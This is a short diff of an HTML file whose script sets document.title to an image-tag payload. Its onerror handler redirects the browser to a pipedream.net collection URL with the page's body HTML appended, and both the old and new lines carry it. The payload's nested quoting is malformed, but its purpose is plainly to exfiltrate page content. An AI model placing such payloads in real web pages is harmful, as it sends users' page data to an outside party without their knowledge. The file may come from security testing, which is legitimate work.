--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
  	<body>
    		<script>
 		this.document.title = "a"; this.document.title =
-		"<img src="a" alt="b" onerror="location.href='https://envdmjv22omhg.x.pipedream.net/'+document.body.innerHTML">"
+		"<img src="a" onerror="location.href='https://envdmjv22omhg.x.pipedream.net/'+ document.body.innerHTML">"
 	 	</script>
 	</body>
 </html>
